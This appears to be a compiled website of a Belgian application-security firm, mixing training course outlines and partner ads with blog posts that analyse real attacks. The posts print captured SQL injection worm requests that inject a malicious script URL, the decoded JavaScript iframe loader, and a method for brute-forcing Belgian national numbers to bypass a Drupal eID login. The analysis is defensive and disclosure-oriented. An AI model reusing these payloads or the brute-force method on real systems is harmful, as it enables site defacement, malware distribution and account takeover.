E-Learning Threat Modeling

Threat Modeling is a key practice for organizations wanting to design and develop secure applications as it helps to identify potential security vulnerabilities early in the process when they are inexpensive to fix. This course walks through the Threat Modeling process step by step so that students understand the value of Threat Modeling and can build threat models for their own systems.

Lesson 1: Threat Modeling: Principles and Practices
After completing this lesson, you should be able to:

• Understand what Threat Modeling is
• Identify when it is appropriate to use
• Explain why Threat Modeling is useful
• Understand how to use Threat Modeling in application development

Free demonstration?

Please contact us for more information, a free demonstration or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

E-Learning Secure Coding for .NET

Once developers understand the basics, they are in a position to start learning more specific design and coding techniques for .NET application security. This course steps through the Open Web Application Security Project (OWASP) Top 10 as well as other common application security issues to demonstrate how applications are compromised and the design and coding practices that can help to secure applications from the Inside out.

Lesson 1: Cross-Site Scripting
After completing this lesson, you should be able to:

• Define Cross-Site Scripting (XSS)
• Recognize methods attackers use to realize an XSS attack
• Identify how XSS attacks compromise users and data
• Identify methods of mitigating XSS in an application

Lesson 2: Injection Flaws
After completing this lesson, you should be able to:

• Identify various types of injection flaws
• Identify means of mitigating injection flaws

Lesson 3: Malicious File Execution
After completing this lesson, you should be able to:

• Detail various methods attackers can use to execute malicious code
• Explain design, policy, and coding steps to protect against malicious file execution

Lesson 4: Insecure Direct Object Reference
After completing this lesson, you should be able to:

• Observe where direct object references occur in applications
• Understand methods of mitigating direct object reference attacks

Lesson 5: Cross-Site Request Forgery
After completing this lesson, you should be able to:

• Explain Cross-Site Request Forgery (CSRF) and its relationship to Cross-Site Scripting
• Explain how applications can protect against CSRF

Lesson 6: Information Leakage & Improper Error Handling
After completing this lesson, you should be able to:

• Describe the information attackers are interested in obtaining
• Describe reliable means of controlling information potential attackers can extract
• Explain methods of mitigating XSS in an application

Lesson 7: Broken Authentication and Session Management
After completing this lesson, you should be able to:

• Identify how an attacker can bypass normal authentication measures
• Review measures to thwart such attacks

Lesson 8: Insecure Cryptographic Storage
After completing this lesson, you should be able to:

• Identify the risks to sensitive data while "at rest"
• Review means of classifying and properly encrypting sensitive data

Lesson 9: Insecure Communications
After completing this lesson, you should be able to:

• Identify the risks inherent in not securing communications between users and applications
• Failure to restrict URL access
• Identify the risks inherent in not restricting access to URLs in your web server

Lesson 10: Failure to Restrict URL Access
After completing this lesson, you should be able to:

• Identify the risks inherent in not restricting access to URLs in your web server

Free demonstration?

Please contact us for more information, a free demonstration or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

E-Learning Secure Coding for Java

Once developers understand the basics, they are in a position to start learning more specific design and coding techniques for Java application security. This course steps through the Open Web Application Security Project (OWASP) Top 10 as well as other common application security issues to demonstrate how applications are compromised and the design and coding practices that can help to secure applications from the Inside out.

Lesson 1: Cross-Site Scripting
After completing this lesson, you should be able to:

• Define Cross-Site Scripting (XSS)
• Recognize methods attackers use to realize an XSS attack
• Identify how XSS attacks compromise users and data
• Identify methods of mitigating XSS in an application

Lesson 2: Injection Flaws
After completing this lesson, you should be able to:

• Identify various types of injection flaws
• Identify means of mitigating injection flaws

Lesson 3: Malicious File Execution
After completing this lesson, you should be able to:

• Detail various methods attackers can use to execute malicious code
• Explain design, policy, and coding steps to protect against malicious file execution

Lesson 4: Insecure Direct Object Reference
After completing this lesson, you should be able to:

• Observe where direct object references occur in applications
• Understand methods of mitigating direct object reference attacks

Lesson 5: Cross-Site Request Forgery
After completing this lesson, you should be able to:

• Explain Cross-Site Request Forgery (CSRF) and its relationship to Cross-Site Scripting
• Explain how applications can protect against CSRF

Lesson 6: Information Leakage & Improper Error Handling
After completing this lesson, you should be able to:

• Describe the information attackers are interested in obtaining
• Describe reliable means of controlling information potential attackers can extract
• Explain methods of mitigating XSS in an application

Lesson 7: Broken Authentication and Session Management
After completing this lesson, you should be able to:

• Identify how an attacker can bypass normal authentication measures
• Review measures to thwart such attacks

Lesson 8: Insecure Cryptographic Storage
After completing this lesson, you should be able to:

• Identify the risks to sensitive data while "at rest"
• Review means of classifying and properly encrypting sensitive data

Lesson 9: Insecure Communications
After completing this lesson, you should be able to:

• Identify the risks inherent in not securing communications between users and applications
• Failure to restrict URL access
• Identify the risks inherent in not restricting access to URLs in your web server

Lesson 10: Failure to Restrict URL Access
After completing this lesson, you should be able to:

• Identify the risks inherent in not restricting access to URLs in your web server

Free demonstration?

Please contact us for more information, a free demonstration or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

E-Learning Introduction to Web Application Security

During one hour we provide students with the basic concepts and terminology for understanding application security issues. It provides a definition of application-level security and demonstrates how these concerns extend beyond those of traditional infrastructure security. We discuss common application security vulnerabilities such as SQL injection, Cross Site Scripting (XSS) and authorization issues.

Lesson 1: Intro & Concepts
After completing this lesson, you should be able to:

• Explain how intended application functionality differs from the intended functionality and how it is interesting to an attacker
• Realize the potential for application inputs to be used as avenues for attack

Lesson 2: Real Case Studies - Notable Breaches
After completing this lesson, you should be able to:

• Appreciate the impact of poor security in production environments
• Justify the mitigation effort to minimize exposed attack surfaces

Lesson 3: Application Attack Demonstration
After completing this lesson, you should be able to:

• Understand the approaches an attacker uses to find application-level vulnerabilities
• Understand the potential for malicious use of features in a vulnerable application

Lesson 4: What is Application Security and Why is it Important?
After completing this lesson, you should be able to:

• Provide a working definition of application security
• Provide explanations of the chief application security concerns: Confidentiality, Integrity and Availability
• Explain why application security is important for organizations to address
• Describe the roles that major regulatory requirements play in secure application development

Lesson 5: SQL Injection Activity
After completing this lesson, you should be able to:

• Understand the basics of an SQL Injection attack
• Understand the potential impact of exploited SQL injection vulnerabilities
• Understand the basics of protecting an application from injection attacks

Lesson 6: HTTP Basics
After completing this lesson, you should be able to:

• Explain the difference between GET and POST requests
• Explain the Lifecycle of HTTP Requests
• Explain the benefits and risks of session authentication over HTTP Basic authentication

Lesson 7: Cross-Site Scripting Activity
After completing this lesson, you should be able to:

• Describe the mechanics behind Cross-Site Scripting (XSS) vulnerabilities and attacks
• Understand how XSS can abuse a user's trust
• Understand the types of risks the exploitation of XSS vulnerabilities poses to web applications

Free demonstration?

Please contact us for more information, a free demonstration or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

E-Learning for developers

ZION SECURITY provides E-Learning training for developers. Organizations can integrate these courses in their E-Learning environment or use our online portal.

With security-focused training for your development team, you build security into your application development process. ZION UNIVERSITY E-Learning is a solution designed by our web application security experts in cooperation with some international experts.

The E-Learning solution is created to help developers understand and apply the principles of secure design and coding.

At this moment we have 4 different E-Learning courses:

• Introduction to Web Application Security
• Secure Coding for Java
• Secure Coding for .NET
• Threat Modeling

Why E-Learning

ZION SECURITY created this E-Learning solution due to the growing need for Application Security Training. Our customers can still choose to follow courses in our training center. A few reasons why E-Learning can be of interest for your organization:

1. On-demand training provides flexibility. For example team members can learn at their own pace. It also serves as a reference tool that developers can return to even after training is complete to refresh their knowledge
2. Interactive platform. The platform includes videos, graphics and animations (interactive quizzes)to provide the highest quality instructional experience
3. Practical, cost-saving solution. It avoids the disruption of pulling an entire team of developers at once for en-mass training and avoids the added expense and logistics of employing trainers to visit multiple locations
4. Keep team members current on new developments and breakthroughs.New threats and attack techniques are exposed on a regular basis. Regular updates to course content keep employees current on industry issues
5. Testing and reporting for documentation. Managers can measure, monitor and report to auditors on employee progress
6. Set a knowledge baseline for new hires. Set a baseline educational requirement for new hires who enter the organization, regardless of instructor-led training schedules

Free demonstration?

Please contact us for more information, a free demonstration or prices by phone (016/29.79.22), by mail (sales@zionsecurity.com) or by filling in a contact form through our website.

Frank talked about the eID, how it works, purposes and architecture.

I discussed about the weaknesses and gave some examples of real bad implementations. 

Also some good news, Fedict built a module for Drupal based on the OpenID provider. So I hope that this will allow to use the eID in Drupal in a secure way.

The presentation can be downloaded here.

To give you some statistics: during the last month we stopped 1150 attempts to inject spam in this blog. The XSS attack is in fact comment spam.

An example of such a request:

POST /blog/2010/3/2/update-about-the-rijksregisternumber.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; Maxthon)
Host: www.zionsecurity.com
Accept: */*
Referer: http://ufsix.ir/index.php/more-about-joomla/25-the-project/5-joomla-license-guidelines.html, http://www.zionsecurity.com/blog/2010/3/2/update-about-the-rijksregisternumber.aspx
X-FORWARDED-FOR: 213.206.5.224, 158.43.240.12, 198.165.92.91, 158.43.240.10, 66.119.34.38, 202.45.127.18
FORWARDED-FOR: 213.206.5.224, 158.43.240.12, 198.165.92.91, 158.43.240.10, 66.119.34.38, 202.45.127.18
X-COMING-FROM: 213.206.5.224, 158.43.240.12, 158.43.240.10, 66.119.34.38

VIA: 1.1 sfcache1 (NetCache NetApp/5.5R6), 1.1 sfcache1 (NetCache NetApp/5.5R6)
Content-Length: 2621
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue

Some strange things here: 2 Referer entries, not 1. And a cascade of anonymous proxies. Also the User-Agent is like a normal user-agent.

My guess is that this is an infected machine that is querying google for keywords like blog, comment, ... and attempts to inject the spam. Spam is removed for obvious reasons from this post :)

Country of origin:

Clicking on one of the links in the spam redirects to a spammed forum (phpBB), where the visitor is being trapped in visiting a porn site because clicking the image with Yesn I am 18+ or No, I am not 18+ gives the same result.

With NoScript enabled, nothing happened. Disabling NoScript and intercepting the traffic in Burp gave some interesting results:

Kaspersky Anti-Virus 6.0 for Windows Workstations Access denied The requested URL could not be retrieved While trying to retrieve the URL: http://pagecsearch.org/cgi-bin/030 The following error was encountered: The requested object is INFECTED with the following viruses: Packed.JS.Agent.cl Please contact your service provider if you consider it incorrect. Generated: 14/04/2010 16:28:02 Kaspersky Anti-Virus 6.0 for Windows Workstations

I wonder what the legal impact is for a Belgian site being infected with this kind of spam and users get redirected to a porn site that tries to infect the user.

iLibris

iLibris is a hosting provider that differentiates from its competitors through an open, personal approach towards the partners and customers. iLibris and ZION SECURITY share the same approach, namely to work in partnership with the customers. iLibris offers a wide range of solutions for web- & application- hosting.  

ZION SECURITY and iLibris started up a unique partnership to offer a secure hosting environment to partners and end customers. The infrastructure of iLibris itself is build with the necessary security controls in mind. However the risks and vulnerabilities lay in the web application(s) or web site.

The goal of this strategic partnership is to solve these vulnerabilities and leaks in a proactive way. ZION SECURITY will assist iLibris and its partners to control these vulnerabilities and risks. Our security experts developed the following solutions:

• Code review: By identifying potential security risks in the development phase, you can already prevent the most common problems. We do not only look into the code, but we can also investigate and assess the development process. Code reviews are executed manually or automatically, depending on the situation.


• Security testing: ZION SECURITY executes security tests on your network and web applications. Our security experts act like a real hacker: we identify vulnerabilities and leaks, investigate how hackers can exploit these vulnerabilities and indicate the risk when a hacker exploits the vulnerabilities.


• Web Application Firewall: A Web Application Firewall protects your web application(s) against attacks from hackers and malware. We developed a unique concept, ZION SECURED WAMAF: for a limited amount a month, your web application(s) are protected against attacks. ZION SECURED WAMAF is integrated in the iLibris infrastructure.


• University: Our security experts train developers to develop secure web applications. We also offer various courses for IT Managers, Network Administrators,... like how to configure and install Web Application Firewalls, how to execute security tests in a consequent manner, how to exploit vulnerabilities in web applications and different topics about network security like VLAN's, NAC, IPS/IDS,...

The final goal of iLibris and ZION SECURITY is to provide a secure hosting environment for customers. This is only possible by sharing services, processes and knowledge.  

Switch now to a secure hosting environment by contacting one of our representatives for an offer without obligation.

Testronic Laboratories

Testronic Laboratories, established in 1998, offers professional and confidential independent quality assurance services to the Home Entertainment and New Media Industries.

A worldwide service is offered from Testronic Laboratories' facilities in the US, UK, Belgium and Poland. In total, Testronic Labs employs over 260 permanent and freelance personnel.

Testronic Laboratories specialises in multimedia quality assurance for all types of content (film, game, music, etc.) on all mediums (DVD, HD-DVD, Blu-ray, CD, online, wireless, etc.) for all devices (optical players, PC, mobile equipment, game consoles, etc.).

Testronic Laboratories offers a wide variety and flexibility of services including Device Compatibility, Functionality, Content Verification & Compliance, Localisation Testing, Controlled Copy Protection Technology and Load Testing.

The different services of Testronic are summarized in 6 divisions:

• Performance
• Functionality
• Usability
• Security
• Compatibility
• Localisation

ZION SECURITY is worldwide partner of Testronic Labs to execute security tests on your network and web applications.

For more information, please visit www.testroniclabs.com or contact one of our representatives.

Nascom & ZION SECURITY: Building secure web applications

Hasselt / Leuven 17 September 2009 An online application developer and an expert in security solutions are joining forces to offer a full service to their customers. Security issues are typically tackled at the moment a ‘hack’ has been determined, and the company is confronted with an acute problem. In the best-case scenario, an application is tested on possible security risks after its delivery. Nascom and ZION SECURITY prefer to adopt a proactive way of handling this. They are introducing security right from the start of the project, and can therefore avoid many unnecessary costs and hassles.

Perfect partners

Applications must be secure, always. That is the starting point of this partnership. Nascom takes care of building the applications and puts the security related issues of delivering (web) applications in the professional hands of a third and independent party. Leuven-based ZION SECURITY proved to be a perfect partner.

ZION SECURITY stays closely involved with the project throughout the entire process to nip security issues in the bud, resulting in 100% secure applications at the time of delivery to the customer.

Investing in knowledge is essential to achieve the common goal that has been set. Nascom employees have been thoroughly trained by ZION SECURITY specialists, to guarantee the right know-how and expertise.

As the first developer of online applications in Belgium, Nascom is implementing a ‘Secure Development Life cycle’ (SDL), and integrating security related knowledge and effort in her standard SDL. This entails among other things that ZION SECURITY will execute a code review as well as testing as a standard for every application that requires it.

Avoid traps

ZION SECURITY will in turn recommend Nascom as a strategic partner for ‘secure web development’ with its customers. They have faith in the level of expertise at Nascom and know that their way of programming and the implementation of the SDL will lead to secure applications.

Thanks to this new approach, typical security related traps can be avoided, since they are tackled right from the start of the project. The customer can count on a secure application at the end of the production process.

Nascom

Jonas Coenen (jonas.coenen@nascom.be)
t: +32 89 20 15 00
f: +32 89 20 15 01

ZION SECURITY

Christophe Joos (Sales & Account Manager) (christophe.joos@zionsecurity.com)
m: +32 495/83 51 31
t: +32 16/29 79 22

Who is Nascom?

Nascom is a young and dynamic agency specialized in 4 interactive fields: Digital Campaigns, Digital Applications, Mobile and Services. Nascom employs over 70 enthusiastic creative and skilled individuals.

Want to know more? Visit www.nascom.be

Who is ZION SECURITY?

The Leuven-based ZION SECURITY was founded in 2005 by Ir. Erwin Geirnaert and Jessica Nieuwdorp. Its consultants are experts in IT and security and have years of experience in executing projects for large, medium and small enterprises. They are specialized in securing business and e-business applications, e-commerce shops and network infrastructure.

Want to know more? Visit www.zionsecurity.com.

Partners

ZION SECURITY has selected three organisations to start up unique partnerships. The goal is to create long term partnerships, like ZION SECURITY always does with its customers.

Each partnership has a specific purpose. At this moment ZION SECURITY has a partnership with Nascom, Testronic Labs and iLibris. Discover now what these partnerships and organisations can do for you.

Telecom Security

More and more organizations are using the various functionalities of Voice-over-IP (VoIP). But no matter which technology (analog or VoIP) your organization uses, are you sure that your telecom infrastructure is protected against attacks from hackers?

During the past months, our security experts have been contacted by some organizations whose telecom infrastructure has been hacked. Hackers could make calls for free and the costs for these hacked organizations varied from 10.000 up to 100.000 euro's.  

To make sure your infrastructure is well protected, ZION SECURITY can execute a security test on your telecom infrastructure, to discover vulnerabilities and to help solve these vulnerabilities and leaks. This can be an external (Black box) or internal (White Box) security test.

One of the techniques we use, during the security test, is "wardialing". This is a technique that already exists for a long time. Wardialing is now popular because many organizations use VoIP, which poses the following questions:

1. Do you know what is connected on your telecom infrastructure?
2. Are all documented modems the only modems in your network?
3. Can you remote configure the telecom infrastructure?
4. ...

Answers on these questions are available after executing a "wardialing"- test. Our security experts scan all telephone numbers your organization uses and we investigate if it is a modem, fax,...

Prevent being hacked by protecting your telecom infrastructure now!

Want to know more?

For more information or a specific quote adapted to your situation, please feel free to contact one of our representatives.

I need you to leave your security questions so I can start writing!

Most of you probably know about the Asprox worm? See http://matchent.com/wpress/?q=node/419

This weekend a bot attacked this blog, protected by ZION SECURED WAMAF:

GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20
cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%
20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.
xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f
EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0
)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c
onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D
687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%
20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20
tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t
AbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

The User Agent indicates that this is not a browser but the well-known tool curl,  running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.

Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:

GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR
%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,
sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20
(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20
b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B
cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6
E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_
cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20
tAbLe_cursoR;-- HTTP/1.1
User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7
Host: www.zionsecurity.com
Accept: */*

Comparing this with the original payload that you can find here shows that the attack above is from a different worm then Asprox, http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html:

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283430303029204445434C41524520546162
6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622
E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220
776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202
8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D
323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7
2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206
57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727
223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646
F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252
23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F
7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F
2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--

First of all:

The worm uses a mix of small and big caps, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is to bypass web application firewalls or filters that trigger on DECLARE, FETCH NEXT FROM TABLE, .. so this is interesting.

The same way to inject the malicious payload is used with CAST:

3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752
E6A733E3C2F7363726970743E

This can be ASCII HEX decoded using Burp Decoder, resulting in <script src=http://www.dnf666.net/u.js></script>.

Loading this script (dangerous!) returns:

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");document.write("<iframe src=http://www.dnf666.net/cnzz.html width=0 height=0></iframe>");}

this returns:

<div style=display:none><script src="http://s10.cnzz.com/stat.php?id=1990191&web_id=1990191" language="JavaScript"></script></div>

Google has not listed this cnzz.com domain as malicious, but it was malicious in the past:

Safe Browsing
Diagnostic page for cnzz.com

What is the current listing status for cnzz.com?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.

Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).

Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.

This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.

Visiting this URL is blocked by ScanSafe:

So it's basically the same like Asprox, injecting a script tag to a malicious file.

Googling for the string dnf666.net/u.js already reveals some victims, including some high profile sites!

Be careful when browsing!

Armorlogic

Armorlogic is focused exclusively on web application and website security and was founded in 2004 by leading Internet security specialists from some of the world's largest Internet security consulting companies.

Armorlogic's goal is to provide a cost effective way to proactively protect web sites, web applications, and their users from attack in a way that network firewalls and intrusion detection systems can not.

Easy to install, maintain and use, Profense is used by thousands of businesses, governments and organizations all over the world to protect Internet facing applications, servers and data. To maximize protection and minimize maintenance and adjustment, Armorlogic believes that the positive security model should be the governing principle of IT security solutions.

ZION SECURITY uses the technology of Profense for ZION SECURED WAMAF, a Web Application Firewall as-a-Service. However, we can also install, configure and monitor the technology of Profense in your datacenter.

Please contact one of our representatives for more information about Armorlogic or ZION SECURED WAMAF.

Web Application Firewall

A Web Application Firewall (WAF) is a layer 7 Firewall (often called proxy firewalls). Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses and attempts to exploit known logical flaws in client software.

ZION SECURITY offers as well commercial Web Application Firewall solutions like F5 and Profense, as open source solutions like Modsecurity. Our security operations team can install and configure these types of WAF's in your infrastructure.  

However the disadvantage of a WAF is that the monitoring of the WAF needs a certain level of web security expertise. This is one of the main reasons why most organizations do not have yet a WAF installed. That's why ZION SECURITY has developed a unique solution, called ZION SECURED WAMAF.

ZION SECURED WAMAF is Security-as-a-Service and completely managed and monitored by our web security experts. ZION SECURED WAMAF protects your web site(s) and web server(s) against attacks and generates detailed reports of detected attacks. More information on www.zionsecured.com.

By using a combination of a WAF with our vulnerability assessment solution ZION VERIFIED, organizations can rest assured that their web applications are secure. The website will be protected to the maximum and your developers will learn how to write secure code in the long run.

The five random numbers are not all five random. The last two are a checksum for the entire number, using a DIV 97. The first three are even numbers for male citizens, and odd numbers for female citizens.

So this means that we can brute-force a Rijksregisternumber in 500 or 499 attempts.

This is better then 9999 so using Burp Intruder with 10 threads/second should take less then a minute to find the valid RRN when we know somebody his birthdate.

ZION SECURITY wrote a whitepaper about implementing a secure authentication framework for the eID, see http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx.

Because it is Drupal, the module is open-source so we took a look at the implementation and to my big surprise, the implementation fails terribly at securing the authentication process.

Testing this in our lab was impossible because the quality of the module is unsatisfying and I don't want to waste time fixing somebody else mistakes. However, it was for me required to blog about the unsecurity of this module before somebody uses it for a production environment. Contacting this web agency resulted in nothing constructive so this is also an eye-opener for them!

What is the problem? There are different problems.

1. They use the serialnumber of the certificate, which is the Rijksregisternummer (SSN) of a Belgian citizen. The usage of this SSN is prohibited by the Belgian Privacy Commission but they use it as a primary key in the Drupal user database (fail!)

2. To authenticate the user, they use a proxy server that will validate the eID certificate and retrieve the values like firstname, lastname and serialnumber. These parameters are then sent to the Drupal site using HTTP in clear text! No protection of the SSN is provided in any way, for example: http//drupalsite/eid/response?firstname=Erwin+Andr%C3%A9&lastname=Geirnaert&serialnr=CENSORED &token=0f2e01a6bedb2dee2df2bde2c05f68c8

3. The token that you notice in the URL above is generated by the Drupal site! This token is visible for the user and can be copied and re-used, in my Drupal site this was /eid.php?token=0f2e01a6bedb2dee2df2bde2c05f68c8&login=CENSORED

4. To make things worse, if we combine the previous information we can logon to any web site that uses this module when we know the SSN number. We don't need the eID, the PIN code or the certificate, only the SSN. How do you get the SSN? The SSN is a string of 11 numbers, where the first 6 are the birthdate of the user and the last 5 are random. So if I know somebody his birthday (LinkedIn, Plaxo, Facebook anyone?) I can brute-force his SSN in 9999 requests to gain access to the Drupal site. These attempts are not detected, blocked or logged!

5. All connections to the Drupal web site are not using HTTPS so it is possible to sniff the user his cookie! Now that is possible to use SSL with client certificates thanks to the Belgian government, unbelievable!

Typing this makes me somewhat angry. Initiatives like OWASP, SANS Secure Coding, ... are useless when people don't want to write secure code and forget about the impact of security bugs and even refuse help from people like us!

 Malware Monitoring

Our Web Anti-Malware (WAM) Malware Monitoring periodically scans your website for malware infections. If we detect that your website has been infected, you will receive an immediate alert with diagnostic information to remove the infection.

Armed with the diagnostic information, the customer (or its web hosting provider) can remove the malicious code, in many cases before the site would get blacklisted.

As a result, the site can continue to operate as normal and avoid getting blacklisted, even after suffering a malware attack. We continue to monitor the site and send alerts if malware activity is detected in the future.

For example Javascript viruses will be immediately detected and escalated to the customer to prevent that visitors of the customer's web site are infected.

Your Key Benefits:

• Avoid getting blacklisted (and avoid revenue and brand losses) with regular scans of your site
• Instant alerts of malware activity on your site (most often before blacklisting occurs)
• Actionable information to resolve the malware problem quickly and avoid getting blacklisted
• Detailed weekly malware scanning reports

Sign up for the Web Anti-Malware Monitoring now by entering your domain name.

Download the PDF for more general information.

Download the PDF about how malware attacks occur.

Download the PDF about malware hurts web business.

 Blacklist Monitoring

If a site has been infected with malware, there is a good chance the site will get blacklisted by Google, Firefox, Internet Explorer, and/or the desktop anti-virus companies. If this happens, the website will suffer losses of traffic, revenue and brand.

Often, sites first discover that they have been blacklisted when a customer notifies them of the blacklisting. We provide an alert service to help websites react quickly if their site has been blacklisted.

The Web Anti-Malware (WAM) Blacklist Monitoring frequently checks your website against a variety of blacklists. If the website appears on a blacklist, you receive an instant alert. You can subsequently return to our experts and diagnose any problems with the blacklisted site.

Your Key Benefits:

• Minimize losses by reacting quickly if your website is blacklisted
• Checks your website regularly against a variety of important blacklists including Google, Firefox, Chrome, and others
• Get an instant alert if your site is blacklisted
• Weekly blacklist report

Sign up for the Web Anti-Malware Blacklist Monitoring FOR FREE by entering your domain name.

Download the PDF for more general information.

Download the PDF about how malware attacks occur.

Download the PDF about malware hurts web business.

Scansafe

Scansafe is the pioneer and largest global provider of SaaS Web Security, ensuring a safe and productive environment for businesses. Scansafe solutions keep malware off corporate networks and allow businesses to control and secure the use of the Web.

Scansafe processes billions of Web requests and millions of blocks each month for customers in over 100 countries.

ZION SECURITY makes use of Scansafe to protect each individual user against external threats.

Scansafe Web Filtering enables businesses to implement granular control for both inbound and outbound communications. For example integrated outbound policy helps prevent leaks of confidential or personal data to the Web. Scansafe Web Filtering protects your network and staff from undesirable Web content, drives productivity, optimizes network resources by reducing bandwidth congestion and provides comprehensive reporting.

Scansafe Web Security analyzes every Web request to determine if content is malicious, inappropriate or acceptable based on the defined security policy. This offers effective protection against threats including zero-day threats that would otherwise be succesful.

Scansafe Anywhere+ protects remote workers to the same level, whether they are working from home, from a hotel or even from a coffee shop. Anywhere+ automatically redirects users to the closest datacenter, ensuring that performance is always optimized.

Please contact one of our representatives for more information or a free trial.

Web Malware Scanning

Web browsing has become the favorite target of malicious code writers seeking to compromise your network. The number of browser vulnerabilities continues to rise, fuelling zero-hour exploits which can infect systems before patches or signatures are available.

The threat is moving from the inbox to the browser with increasing focus on gaining financial advantage. This is most evident in the recent rise of spyware which comes in a wide variety of forms, from programs that steal confidential information to nuisance adware.

By the time most administrators realize they have a problem, the damage is already done, and they are left with the high cost of remediation, lost productivity, and unnecessary network traffic and system instabilities.

Increasing browser vulnerabilities, zero-hour threats, and the insertion of malicious code on legitimate sites have made real-time malware scanning essential (simply filtering by URL leaves a large security gap).

Scansafe's Web Malware Scanning service eliminates all types of harmful Web malware, including spyware, viruses and zero-hour threats before they can enter and infect your network.

This service delivers true layered defense through a combination of multiple best-in-class signature scan engines, multiple reputation and behavior analysis engines, automated machine-learning heuristics, and the industry's largest Web data set.

All Web requests are scanned in real-time, rather than solely relying on static URL lists, providing you with dynamic, real-time, and multi-layered protection.

Anti-malware scan engines will protect your network from threats that have been previously identified and documented. But what if your network is one of the first to be attacked?

Signature-based scanning alone will not provide the protection you need. Scansafe has developed Outbreak Intelligence, a proprietary security platform which analyzes URL reputation, traffic behaviour, code behaviour and code reputation in addition to signatures to detect unknown as well as known malware. Once it has detected unknown malware, Outbreak Intelligence automatically propagates the protection to the scanning layer, where the threat is neutralized before it can reach your network.

